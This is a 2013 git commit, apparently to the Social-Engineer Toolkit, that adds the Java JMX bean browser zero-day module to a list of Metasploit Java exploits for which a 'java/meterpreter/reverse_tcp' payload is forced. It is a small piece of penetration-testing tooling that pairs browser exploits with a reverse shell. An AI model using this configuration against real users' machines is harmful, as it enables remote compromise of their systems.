Forced java meterpreter for the new java zero day

This commit is contained in:
trustedsec 2013-01-14 07:57:40 -05:00
parent fcf8739258
commit 1de0c8cbc3

View file

@ -93,7 +93,7 @@ if choice1 == '':choice1 ='2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec":
if exploit == "exploit/windows/browser/java_codebase_trust" or exploit == "exploit/multi/browser/java_atomicreferencearray" or exploit == "exploit/multi/browser/java_verifier_field_access" or exploit == "exploit/multi/browser/java_jre17_exec" or exploit == "exploit/multi/browser/java_jre17_jmxbean":
print "[*] Selecting Java Meterpreter as payload since it is exploit specific."
choice1 = ("java/meterpreter/reverse_tcp")